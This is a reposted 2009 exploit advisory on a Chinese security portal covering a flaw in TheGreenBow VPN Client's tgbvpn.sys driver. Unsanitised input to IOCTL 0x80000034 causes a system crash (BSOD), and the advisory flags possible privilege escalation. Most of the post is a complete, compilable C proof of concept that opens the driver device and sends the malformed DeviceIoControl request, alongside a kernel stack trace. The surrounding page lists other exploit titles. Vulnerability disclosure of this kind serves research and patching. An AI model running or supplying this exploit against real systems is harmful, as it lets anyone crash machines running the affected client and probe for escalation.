首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit
来源:http://evilcry.netsons.org 作者:Evilcry 发布时间:2009-08-19  

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
             http://evilcodecave.blogspot.com
             http://evilcodecave.wordpress.com
             http://evilfingers.com
             http://malwareAnalytics.com [under construction]

Release Date: 15/08/2009

+-------------------------------------------------+
Product: TheGreenBow VPN Client 4.61.003  (other versions could be affected)
Affected Component: tgbvpn.sys
Category: Local Denial of Service (BSOD)
         (untested) Local Privilege Escalation

+-------------------------------------------------+

 

--------------------------[Details]--------------->

TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input
(IOCTL)
and this lead to a Driver Collapse that propagates on the system with a
BSOD,
and potential risk of Privilege Escalation.

Affected IOCTL is 0x80000034

Transfer Type: METHOD_BUFFERED

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51
00000000 00000000 00000000 00000000 00000000 0x841d36a8


+--------------------------------------------------------------------------------------------+
/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 * http://evilcodecave.blogspot.com
 * http://evilcodecave.wordpress.com
 * http://evilfingers.com
 * http://malwareAnalytics.com [under construction]
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
   HANDLE hDevice;
   DWORD Junk;

 

   system("cls");
   printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");

   hDevice = CreateFileA("\\\\.\\tgbvpn",
                       0,
                       FILE_SHARE_READ | FILE_SHARE_WRITE,
                       NULL,
                       OPEN_EXISTING,
                       0,
                       NULL);

   if (hDevice == INVALID_HANDLE_VALUE)
   {
       printf("\n Unable to Device Driver\n");
       return EXIT_FAILURE;
   }

   DeviceIoControl(hDevice, 0x80000034,(LPVOID) 0x80000001, 0, (LPVOID)
0x80000002, 0, &Junk, (LPOVERLAPPED)NULL);


   return EXIT_SUCCESS;
}

+--------------------------------------------------------------------------------------------+
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SPIP < 2.0.9 Arbitrary Copy Al
·Arcadem Pro 2.8 (article) Blin
·AJ Auction Pro OOPD 2.x (store
·MS Internet Explorer (Javascri
·HTML Email Creator & Sender 2.
·broid 1.0 Beta 3a (.mp3 File)
·BaBB 2.8 Remote Code Injection
·Xenorate Media Player 2.6.0.0
·Linux Kernel < 2.6.30.5 cfg802
·Joomla Component MisterEstate
·Playlistmaker 1.51 (.m3u File)
·KOL Player 1.0 (.mp3 File) Loc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved